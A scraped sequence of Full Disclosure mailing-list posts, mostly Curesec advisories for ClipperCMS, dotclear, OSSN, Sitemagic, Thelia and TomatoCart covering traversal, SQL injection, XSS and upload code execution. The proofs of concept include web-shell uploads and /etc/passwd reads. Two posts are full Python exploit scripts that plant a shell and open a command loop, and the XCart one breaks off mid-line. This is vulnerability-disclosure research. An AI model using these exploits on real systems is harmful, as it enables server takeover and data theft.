http://seclists.org/fulldisclosure/
[FD] ClipperCMS 1.3.0: Path Traversal
Security Advisory - Curesec Research Team 1. Introduction Affected Product:ClipperCMS 1.3.0 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: http://www.clippercms.com/ Vulnerability Type: Path Traversal Remote Exploitable: Yes Reported to vendor: 10/02/2015 Disclosed to public: 11/13/2015 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description CVSS Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N Description The "file" Parameter of the file browser is vulnerable to directory traversal, allowing the download of arbitrary files. A user account is needed with at least the lowest default role, which is "Editor". 3. Proof of Concept POST /ClipperCMS-clipper_1.3.0/manager/media/browser/kcfinder/browse.php?type=images&lng=en&act=download HTTP/1.1 dir=images&file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd 4. Code /ClipperCMS-clipper_1.3.0/manager/media/browser/kcfinder/core/browser.php protected function act_download() { $dir = $this->postDir(); if (!isset($this->post['dir']) || !isset($this->post['file']) || (false === ($file = "$dir/{$this->post['file']}")) || !file_exists($file) || !is_readable($file) ) $this->errorMsg("Unknown error."); header("Pragma: public"); header("Expires: 0"); header("Cache-Control: must-revalidate, post-check=0, pre-check=0"); header("Cache-Control: private", false); header("Content-Type: application/octet-stream"); header('Content-Disposition: attachment; filename="' . str_replace('"', "_", $this->post['file']) . '"'); header("Content-Transfer-Encoding:Â binary"); header("Content-Length: " . filesize($file)); readfile($file); die; } 5. Solution This issue has not been fixed by the vendor. 6. Report Timeline 10/02/2015 Informed Vendor about Issue (no reply) 10/21/2015 Reminded Vendor of Disclosure Date (no reply) 11/13/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/ClipperCMS-130-Path-Traversal-98.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] ClipperCMS 1.3.0: SQL Injection
Security Advisory - Curesec Research Team 1. Introduction Affected Product:ClipperCMS 1.3.0 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: http://www.clippercms.com/ Vulnerability Type: SQL Injection Remote Exploitable: Yes Reported to vendor: 10/02/2015 Disclosed to public: 11/13/2015 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview There are multiple SQL Injection vulnerabilities in ClipperCMS 1.3.0. An account with the role "Publisher" or "Administrator" is needed to exploit each of these vulnerabilities. 3. SQL Injection 1 (Blind) CVSS Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P Description The id parameter of the web user editor is vulnerable to blind SQL Injection. To exploit this issue, an account is needed that has the right to manage web users. Users with the role "Publisher" or "Administrator" have this by default. Proof of Concept http://localhost//ClipperCMS-clipper_1.3.0/manager/index.php?a=88&id=1 AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(5000,ENCODE('MSG','by 5 seconds')),null) %23 -> true http://localhost//ClipperCMS-clipper_1.3.0/manager/index.php?a=88&id=1 AND IF(SUBSTRING(version(), 1, 1)='4',BENCHMARK(5000,ENCODE('MSG','by 5 seconds')),null) %23 -> false Code /manager/actions/mutate_web_user.dynamic.php $sql = "SELECT * FROM $dbase.`".$table_prefix."web_groups` where webuser=".$_GET['id'].""; 4. SQL Injection 2 CVSS Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P Description When updating a user, the newusername parameter is vulnerable to SQL injection. To exploit this issue, an account is needed that has the right to manage web users. Users with the role "Publisher" or "Administrator" have this by default. Proof of Concept POST /ClipperCMS-clipper_1.3.0/manager/index.php?a=32 HTTP/1.1 mode=12&id=3&blockedmode=0&stay=&oldusername=testtest &newusername=testtest' or extractvalue(1,concat(0x7e,(SELECT concat(user) FROM mysql.user limit 0,1))) -- - &newpassword=0&passwordgenmethod=g&specifiedpassword=&confirmpassword=&passwordnotifymethod=s&fullname=&email=foo3%40example.com&oldemail=foo3%40example.com&role=2&phone=&mobilephone=&fax=&state=&zip=&country=&dob=&gender=&comment=&failedlogincount=0&blocked=0&blockeduntil=&blockedafter=&manager_language=english&manager_login_startup=&allow_manager_access=1&allowed_ip=&manager_theme=&filemanager_path=&upload_images=&default_upload_images=1&upload_media=&default_upload_media=1&upload_flash=&default_upload_flash=1&upload_files=&default_upload_files=1&upload_maxsize=&which_editor=&editor_css_path=&rb_base_dir=&rb_base_url=&tinymce_editor_theme=&tinymce_custom_plugins=&tinymce_custom_buttons1=&tinymce_custom_buttons2=&tinymce_custom_buttons3=&tinymce_custom_buttons4=&tinymce_css_selectors=&photo=&save=Submit+Query Code /manager/processors/save_user_processor.php $sql = "UPDATE " . $modx->getFullTableName('manager_users') . " SET username='$newusername'" . $updatepasswordsql . " WHERE id=$id"; 5. SQL Injection 3 CVSS Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P Description When updating a user, the country, role, blocked, blockeduntil, blockedafter, failedlogincount, and gender parameter are vulnerable to SQL injection. To exploit this issue, an account is needed that has the right to manage web users. Users with the role "Publisher" or "Administrator" have this by default. Proof of Concept The proof of concepts for the country, role, blocked, blockeduntil, failedlogincount, and blockedafter parameter are analog to this POC for gender: POST /ClipperCMS-clipper_1.3.0/manager/index.php?a=32 HTTP/1.1 mode=12&id=3&blockedmode=0&stay=&oldusername=testtest&newusername=testtest&newpassword=0&passwordgenmethod=g&specifiedpassword=&confirmpassword=&passwordnotifymethod=s&fullname=&email=foo6%40example.com&oldemail=foo3%40example.com&role=2&phone=&mobilephone=&fax=&state=&zip=&country=&dob= &gender=2', fax=(SELECT concat(user) FROM mysql.user limit 0,1), dob='0 &comment=&failedlogincount=0&blocked=0&blockeduntil=&blockedafter=&manager_language=english&manager_login_startup=&allow_manager_access=1&allowed_ip=&manager_theme=&filemanager_path=&upload_images=&default_upload_images=1&upload_media=&default_upload_media=1&upload_flash=&default_upload_flash=1&upload_files=&default_upload_files=1&upload_maxsize=&which_editor=&editor_css_path=&rb_base_dir=&rb_base_url=&tinymce_editor_theme=&tinymce_custom_plugins=&tinymce_custom_buttons1=&tinymce_custom_buttons2=&tinymce_custom_buttons3=&tinymce_custom_buttons4=&tinymce_css_selectors=&photo=&save=Submit+Query Visiting the overview page of that user will show the result of the injected query. Code /manager/processors/save_user_processor.php $sql = "UPDATE " . $modx->getFullTableName('user_attributes') . " SET fullname='$fullname', role='$roleid', email='$email', phone='$phone', mobilephone='$mobilephone', fax='$fax', zip='$zip', state='$state', country='$country', gender='$ge
[FD] ClipperCMS 1.3.0: CSRF
Security Advisory - Curesec Research Team 1. Introduction Affected Product:ClipperCMS 1.3.0 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: http://www.clippercms.com/ Vulnerability Type: CSRF Remote Exploitable: Yes Reported to vendor: 10/02/2015 Disclosed to public: 11/13/2015 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description CVSS Medium 5.1 AV:N/AC:L/Au:S/C:P/I:P/A:P Description The only protection against CSRF is a referer check. This check can be disabled by a user with the rights to edit settings, thus making the application vulnerable to CSRF. A user may choose to disable referer checks, because when they are enabled, external links or direct entry/bookmarks to specific pages in the backend do not work, which severely limits the usability of the application 3. Solution This issue has not been fixed by the vendor. 4. Report Timeline 10/02/2015 Informed Vendor about Issue (no reply) 10/21/2015 Reminded Vendor of Disclosure Date (no reply) 11/13/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/ClipperCMS-130-CSRF-97.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] ClipperCMS 1.3.0: Code Execution Exploit
#!/usr/local/bin/python # Exploit for ClipperCMS 1.3.0 Code Execution vulnerability # An account is required with rights to file upload (eg a user in the Admin, Publisher, or Editor role) # The server must parse htaccess files for this exploit to work. # Curesec GmbH c...@curesec.com import sys import re import requests # requires requests lib if len(sys.argv) != 4: exit("usage: python " + sys.argv[0] + " http://example.com/ClipperCMS/ admin admin") url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] loginPath = "/manager/processors/login.processor.php" fileManagerPath = "/manager/index.php?a=31" def login(requestSession, url, username, password): postData = {"ajax": "1", "username": username, "password": password} return requestSession.post(url, data = postData, headers = {"referer": url}) def getFullPath(requestSession, url): request = requestSession.get(url, headers = {"referer": url}) if "You don't have enough privileges" in request.text: return "cant upload" fullPath = re.search("var current_path = '(.*)';", request.text) return fullPath.group(1) def upload(requestSession, url, fileName, fileContent, postData): filesData = {"userfile[0]": (fileName, fileContent)} return requestSession.post(url, files = filesData, data = postData, headers = {"referer": url}) def workingShell(url, fullPath): return fullPath.strip("/") in requests.get(url + "pwd", headers = {"referer": url}).text.strip("/") def runShell(url): print("enter command, or enter exit to quit.") command = raw_input("$ ") while "exit" not in command: print(requests.get(url + command).text) command = raw_input("$ ") requestSession = requests.session() loginResult = login(requestSession, url + loginPath, username, password) if "Incorrect username" in loginResult.text: exit("ERROR: Incorrect username or password") else: print("successful: login as " + username) fullPath = getFullPath(requestSession, url + fileManagerPath) if fullPath == "cant upload": exit("ERROR: user does not have required privileges") else: print("successful: user is allowed to use file manager. Full path: " + fullPath) uploadResult = upload(requestSession, url + fileManagerPath, ".htaccess", "AddType application/x-httpd-php .png", {"path": fullPath}) if "File uploaded successfully" not in uploadResult.text: exit("ERROR: could not upload .htaccess file") else: print("successful: .htaccess upload") uploadResult = upload(requestSession, url + fileManagerPath, "404.png", "", {"path": fullPath}) if "File uploaded successfully" not in uploadResult.text: exit("ERROR: could not upload shell") else: print("successful: shell upload. Execute commands via " + url + "404.png?x=") if workingShell(url + "404.png?x=", fullPath): print("successful: shell seems to be working") else: exit("ERROR: shell does not seem to be working correctly") runShell(url + "404.png?x=") #Blog Reference: #http://blog.curesec.com/article/blog/ClipperCMS-130-Code-Execution-Exploit-96.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] ClipperCMS 1.3.0: Code Execution
Security Advisory - Curesec Research Team 1. Introduction Affected Product:ClipperCMS 1.3.0 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: http://www.clippercms.com/ Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 10/02/2015 Disclosed to public: 11/13/2015 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description CVSS High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C Description The file upload uses a whitelist to only allow non-dangerous file extensions. However, it does allow the upload of .htaccess files, which means that an attacker can upload files with any extension and still gain code execution. An account is required to upload files. The role the account is in needs the right to upload files. By default, the lowest user role - Editor - has this right. 3. Proof of Concept The file upload can be found here: http://localhost/ClipperCMS-clipper_1.3.0/manager/index.php?a=31 To gain code execution, upload a .htaccess file with the content: AddType application/x-httpd-php .png Now, any uploaded file containing PHP code with the extension .png will be executed. 3. Solution This issue has not been fixed by the vendor. 4. Report Timeline 10/02/2015 Informed Vendor about Issue (no reply) 10/21/2015 Reminded Vendor of Disclosure Date (no reply) 11/13/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/ClipperCMS-130-Code-Execution-95.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] dotclear 2.8.1: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product:dotclear 2.8.1 Fixed in:2.8.2 Fixed Version Link: http://download.dotclear.org/latest.zip Vendor Website: http://dotclear.org/ Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 10/02/2015 Disclosed to public: 11/13/2015 Release mode:Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N Description The Comment author name is echoed inside the value attribute of an input tag when viewing the list of all comments for that author. Quotes are not encoded, which allows for the addition of further attributes to the tag. The field is hidden, so onfocus or similar do not work, and the length of the name is limited, which makes an actual exploitation unlikely. Still, with older browser an attacker might try to inject a style attribute which may lead to XSS. 3. Proof of Concept 1. Create comment with author name " newattribute="value 2. Visit http://localhost/dotclear/admin/comments.php?n=30&status=&sortby=comment_dt&order=desc&author=%22+newattribute%3D%22value 3. The result will be: 4. Solution To mitigate this issue please upgrade at least to version 2.8.2: http://download.dotclear.org/latest.zip Please note that a newer version might already be available. 5. Report Timeline 10/02/2015 Informed Vendor 10/25/2015 Vendor releases fix 11/13/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/dotclear-281-XSS-94.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] dotclear 2.8.1: Code Execution
Security Advisory - Curesec Research Team 1. Introduction Affected Product:dotclear 2.8.1 Fixed in:2.8.2 Fixed Version Link: http://download.dotclear.org/latest.zip Vendor Website: http://dotclear.org/ Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 10/02/2015 Disclosed to public: 11/13/2015 Release mode:Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C Description While upload of files with extension php, php4, and php5 is forbidden, upload of files with the extension pht, phps, and phtml is allowed, which will lead to code execution with most default Apache configurations. The upload form is located here: http://localhost/dotclear/admin/media.php?popup=1&plugin_id=dcLegacyEditor A user with the right "manage their own media items" and "manage their own entries and comments" is needed to exploit this issue. 3. Code /dotclear/inc/libs/clearbricks/filemanager public function uploadFile($tmp,$dest,$overwrite=false) { $dest = $this->pwd.'/'.path::clean($dest); if ($this->isFileExclude($dest)) { throw new Exception(__('Uploading this file is not allowed.')); } [...] if (@move_uploaded_file($tmp,$dest) === false) { throw new Exception(__('An error occurred while writing the file.')); } [...] } [...] protected function isFileExclude($f) { if (!$this->exclude_pattern) { return false; } return preg_match($this->exclude_pattern,$f); } /dotclear/inc/core/class.dc.media.php $this->exclude_pattern = $core->blog->settings->system->media_exclusion; /dotclear/inc/core/class.dc.core.php array('media_exclusion','string','/\.php[0-9]*$/i', 'File name exclusion pattern in media manager. (PCRE value)'), Note that after installation, the regex is retrieved from the settings table of the database, not from the code. 4. Solution To mitigate this issue please upgrade at least to version 2.8.2: http://download.dotclear.org/latest.zip Please note that a newer version might already be available. 5. Report Timeline 10/02/2015 Informed Vendor 10/25/2015 Vendor releases fix 11/13/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/dotclear-281-Code-Execution-93.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Open Source Social Network 3.5: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Open Source Social Network 3.5 Product: Fixed in:3.6 Fixed Versionhttps://www.opensource-socialnetwork.org/downloads/ Link:ossn-v3.6-1443545762.zip Vendor Contact: https://www.opensource-socialnetwork.org/contact VulnerabilityXSS Type: Remote Yes Exploitable: Reported to 09/29/2015 vendor: Disclosed to 11/13/2015 public: Release mode:Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview There are two reflected XSS vulnerabilities in Open Source Social Network 3.5. With this, it is possible to inject JavaScript keyloggers, or to bypass CSRF protection, which in this case may lead to code execution. 3. XSS 1 CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Proof of Concept http://localhost/ossn/search?q='">alert(1) Code /ossn/themes/default/plugins/menus/search.php $menus = $params['menu']; echo ""; echo '' . ossn_print('result:type') . ''; foreach ($menus as $menu => $val) { foreach ($val as $link) { $menu = str_replace(':', '-', $link['text']); $icon = ossn_site_url() . "components/OssnSearch/images/{$menu}.png"; $text = ossn_print($link['text']); $link = $link['href']; echo " {$text} "; } } echo ''; 4. XSS 2 CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Proof of Concept http://localhost/ossn/home?offset=2&foo='">alert(1) Code /ossn/themes/default/pagination/view.php if (count($_GET)) { $args_url = ''; foreach ($_GET as $key => $value) { if ($key != 'page') { $args_url .= '&' . $key . '=' . $value; } } } [...] $url = "?offset={$first}{$args_url}"; echo "".ossn_print('ossn:pagination:first').""; 5. XSS to Code Execution Description Because the backend allows the upload of PHP files, the XSS vulnerabilities can lead to code execution. Proof of Concept http://localhost/ossn/search?q='">http://localhost/s.js> /s.js: var csrfProtectedPage = 'http://localhost/ossn/administrator/theme_installer'; var html = get(csrfProtectedPage); document.body.innerHTML = html; var token = document.getElementsByName("ossn_token")[0].value; var timestamp = document.getElementsByName("ossn_ts")[0].value; submitRequest(token, timestamp); function get(url) { var xmlHttp = new XMLHttpRequest(); xmlHttp.open("GET", url, false); xmlHttp.send(null); return xmlHttp.responseText; } function submitRequest(token, timestamp) { var xhr = new XMLHttpRequest(); xhr.open("POST", "http://localhost/ossn/action/admin/theme_install";, true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---1441530840601255132539565608"); xhr.withCredentials = true; var body = "-1441530840601255132539565608\r\n" + "Content-Disposition: form-data; name=\"ossn_ts\"\r\n" + "\r\n" + "" + timestamp + "\r\n" + "-1441530840601255132539565608\r\n" + "Content-Disposition: form-data; name=\"ossn_token\"\r\n" + "\r\n" + "" + token + "\r\n" + "-1441530840601255132539565608\r\n" + "Content-Disposition: form-data; name=\"theme_file\"; filename=\"mycustomtheme.zip\"\r\n" + "Content-Type: application/x-zip-compressed\r\n" + "\r\n" + "PK\x03\x04\x14\x03\x00\x00\x00\x00\xe5x\x3cG\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00mycustomtheme/PK\x03\x04\n" + "\x03\x00\x00\x00\x00\xbcx\x3cG\xf6+\xec\x8e\x1c\x00\x00\x00\x1c\x00\x00\x00\x15\x00\x00\x00mycustomtheme/404.php\x3c?php passthru($_GET[\'x\']);\n" + "PK\x03\x04\n" + "\x03\x00\x00\x00\x00\xe1x\x3cG\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00mycustomtheme/ossn_theme.phpPK\x03\x04\n" + "\x03\x00\x00\x00\x00\xe5x\x3cG\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00mycustomtheme/ossn_theme.xmlPK\x01\x02?\x03\x14\x03\x00\x00\x00\x00\xe5x\x3cG\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x80\xedA\x00\x00\x00\x00mycustomtheme/PK\x01\x02?\x03\n" + "\x03\x00\x00\x00\x00\xbcx\x3cG\xf6+\xec\x8e\x1c\x00\x00\x00\x1c\x00\x00\x00\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x80\xa4\x81,\x00\x00\x00mycustomtheme/404.phpPK\x01\x02?\x03\n" + "\x03\x00\x00\x00\x00\xe1x\x3cG\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x80\xa4\x81{\x00\x00\x00mycustomtheme/ossn_theme.phpPK\x01\x02?\x03\n" + "\x03\x00\x00\x00\x00\xe5x\x3cG\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x80\xa4\x81\xb5\x00\x00\x00mycustomtheme/ossn_theme.xmlPK\x05\x06\x00\x00\x00\x00\x04\x00\x04\x00\x13\x01\x00\x00\xef\x00\x00\x00\x00\x00\r\n"
[FD] Sitemagic CMS 4.1: XSS
Security Advisory - Curesec Research Team 1. Introduction AffectedSitemagic CMS 4.1 Product: Fixed in: 4.1.1 Fixed Version http://sitemagic.org/index.php?SMExt=SMDownloads&; Link: SMDownloadsFile=SitemagicCMS411.zip Vendor Contact: d...@sitemagic.org Vulnerability XSS Type: Remote Yes Exploitable: Reported to 09/29/2015 vendor: Disclosed to11/13/2015 public: Release mode: Coordinated release CVE:n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description If debug is enabled - which it is by default - the values of POST and GET are echoed unencoded, leading to an XSS vulnerability. With this, it is possible to inject JavaScript keyloggers, or to bypass CSRF protection, which in this case may lead to code execution. 3. Proof of Concept http://localhost/Sitemagic/?dump=true&foo='">alert(1) 4. Code index.php if ($debug === true) { $end = microtime(true); if (isset($_REQUEST["dump"]) === true) { $time = $end - $start; echo "Memory usage: " . memory_get_usage(true) / 1024 . " KB"; echo "Time usage: " . $time . " seconds"; echo " POST " . print_r($_POST, true) . " GET " . print_r($_GET, true) . " "; } } 5. XSS to Code Execution Because the file upload in the admin area does not restrict the file type, an attacker can gain code execution via the XSS vulnerability. http://localhost/Sitemagic/?dump=true&foo=";>http://localhost/s.js";> /s.js: submitRequest(); function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http://localhost/Sitemagic/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages%2Fdemo";, true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---72100436920187879541838388265"); xhr.withCredentials = true; var body = "-72100436920187879541838388265\r\n" + "Content-Disposition: form-data; name=\"SMInputSMFilesUpload\"; filename=\"shell.php\"\r\n" + "Content-Type: application/x-php\r\n" + "\r\n" + "\x3c?php passthru($_GET[\'x\']); ?\x3e\n" + "\r\n" + "-72100436920187879541838388265\r\n" + "Content-Disposition: form-data; name=\"SMPostBackControl\"\r\n" + "\r\n" + "\r\n" + "-72100436920187879541838388265--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } 6. Solution To mitigate this issue please upgrade at least to version 4.1.1: http://sitemagic.org/index.php?SMExt=SMDownloads&SMDownloadsFile= SitemagicCMS411.zip Please note that a newer version might already be available. 7. Report Timeline 09/29/2015 Informed Vendor about Issue 09/29/2015 Vendor releases fix 11/13/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/Sitemagic-CMS-41-XSS-91.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Thelia 2.2.1: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product:Thelia 2.2.1 Fixed in:not fixed Fixed Version Link: n/a Vendor Contact: i...@thelia.net Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 09/29/2015 Disclosed to public: 11/13/2015 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description Thelia 2.2.1 suffers from an XSS vulnerability. With this, it is for example possible to inject JavaScript keyloggers, or to bypass CSRF protection. 3. Proof of Concept http://localhost/thelia_2.1.5/web/admin/home/stats?month=95&year=20155 4. Solution This issue has not been fixed by the vendor 5. Report Timeline 09/29/2015 Informed Vendor about Issue (no reply) 10/21/2015 Reminded Vendor of Disclosure Date (no reply) 11/13/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/Thelia-221-XSS-90.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] TomatoCart v1.1.8.6.1: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product:TomatoCart v1.1.8.6.1 Fixed in:not fixed Fixed Version Link: n/a Vendor Contact: supp...@tomatocart.com Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 09/29/2015 Disclosed to public: 11/13/2015 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview There are two reflected XSS vulnerabilities in TomatoCart v1.1.8.6.1. With this, it is possible to inject JavaScript keyloggers, or to bypass CSRF protection, which in the case of TomatoCart may lead to code execution. 3. XSS 1 CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Proof of Concept http://localhost/ecommerce/TomatoCart-v1-released-v1.1.8.6.1/info.php?faqs&faqs_id='">alert(1) Code templates/bootstrap/content/info/faqs.php:70 if(question.getParent().id == 'faq') { question.getElement('i').set('class', 'icon-minus'); question.getNext().setStyle('display', ''); } 4. XSS 2 CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Proof of Concept http://localhost/ecommerce/TomatoCart-v1-released-v1.1.8.6.1/checkout.php?checkout&view='">alert(1) Code templates/bootstrap/content/checkout/checkout.php:182 view: '', 5. Solution This issue has not been fixed by the vendor 6. Report Timeline 09/29/2015 Informed Vendor about Issue (no reply) 10/21/2015 Reminded Vendor of Disclosure Date (no reply) 11/13/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/TomatoCart-v11861-XSS-89.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] TomatoCart v1.1.8.6.1: Code Execution
Security Advisory - Curesec Research Team 1. Introduction Affected Product:TomatoCart v1.1.8.6.1 Fixed in:not fixed Fixed Version Link: n/a Vendor Contact: supp...@tomatocart.com Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 09/29/2015 Disclosed to public: 11/13/2015 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview TomatoCart has multiple locations where the upload of images is allowed. In two of these locations, the file type and extension of the uploaded file are not checked, which leads to code execution. Please note that an admin account with at least some privileges is required to exploit this issue. 3. Code Execution 1 CVSS High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C Description When uploading a new slide image, there are no checks as to what type the uploaded image actually is. Because of this, an attacker that gained admin credentials can upload a PHP file and thus gain code execution. The rights needed are Content -> Slide Images. Proof of Concept curl -i -s -k -X 'POST' \ -H 'Content-Type: multipart/form-data; boundary=1106460043' \ -b 'toCAdminID=4tfpeotn6bp65cm70mcekauhk1; PHPSESSID=6hioh2kisld85o5f3qo3e5gf86' \ --data-binary $'--1106460043\x0d\x0aContent-Disposition: form-data; name=\"image1\"; filename=\"test2.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0ahttp://localhost/ecommerce/TomatoCart-v1-released-v1.1.8.6.1/admin/json.php' 3. Code Execution 2 CVSS High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C Description When uploading a new product image, there are no checks as to what type the uploaded image actually is. Because of this, an attacker that gained admin credentials can upload a PHP file and thus gain code execution. The rights needed are Content -> Products. Proof of Concept curl -i -s -k -X 'POST' \ -H 'Content-Type: multipart/form-data; boundary=1775010584' \ -b 'toCAdminID=4tfpeotn6bp65cm70mcekauhk1; PHPSESSID=6hioh2kisld85o5f3qo3e5gf86' \ --data-binary $'--1775010584\x0d\x0aContent-Disposition: form-data; name=\"APC_UPLOAD_PROGRESS\"\x0d\x0a\x0d\x0a5305684637\x0d\x0a--1775010584\x0d\x0aContent-Disposition: form-data; name=\"UPLOAD_IDENTIFIER\"\x0d\x0a\x0d\x0a5305684637\x0d\x0a--1775010584\x0d\x0aContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\x0d\x0a\x0d\x0a4194304\x0d\x0a--1775010584\x0d\x0aContent-Disposition: form-data; name=\"ext-gen4881\"; filename=\"test.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0ahttp://localhost/ecommerce/TomatoCart-v1-released-v1.1.8.6.1/admin/json.php?module=products&action=upload_image' 5. Solution This issue has not been fixed by the vendor 6. Report Timeline 09/29/2015 Informed Vendor about Issue (no reply) 10/21/2015 Reminded Vendor of Disclosure Date (no reply) 11/13/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/TomatoCart-v11861-Code-Execution-88.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] XCart 5.2.6: Code Execution Exploit
#!/usr/local/bin/python # Exploit for XCart 5.2.6 Code Execution vulnerability # An admin account is required to use this exploit # Curesec GmbH import sys import re import requests # requires requests lib if len(sys.argv) != 4: exit("usage: python " + sys.argv[0] + " http://example.com/xcart/ ad...@example.com admin") url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] loginPath = "/admin.php?target=login" fileManagerPath = "/admin.php?target=logo_favicon" shellFileName = "404.php" shellContent = "GIF89a;" def login(requestSession, url, username, password): csrfRequest = requestSession.get(url) csrfTokenRegEx = re.search('name="xcart_form_id" type="hidden" value="(.*)" class', csrfRequest.text) csrfToken = csrfTokenRegEx.group(1) postData = {"target": "login", "action": "login", "xcart_form_id": csrfToken, "login": username, "password": password} loginResult = requestSession.post(url, data = postData).text return "Invalid login or password" not in loginResult def upload(requestSession, url, fileName, fileContent): csrfRequest = requestSession.get(url) csrfTokenRegEx = re.search('SimpleCMS" />\n', csrfRequest.text) csrfToken = csrfTokenRegEx.group(1) filesData = {"logo": (fileName, fileContent)} postData = {"target": "logo_favicon", "action": "update", "page": "CDev\SimpleCMS", "xcart_form_id": csrfToken} uploadResult = requestSession.post(url, 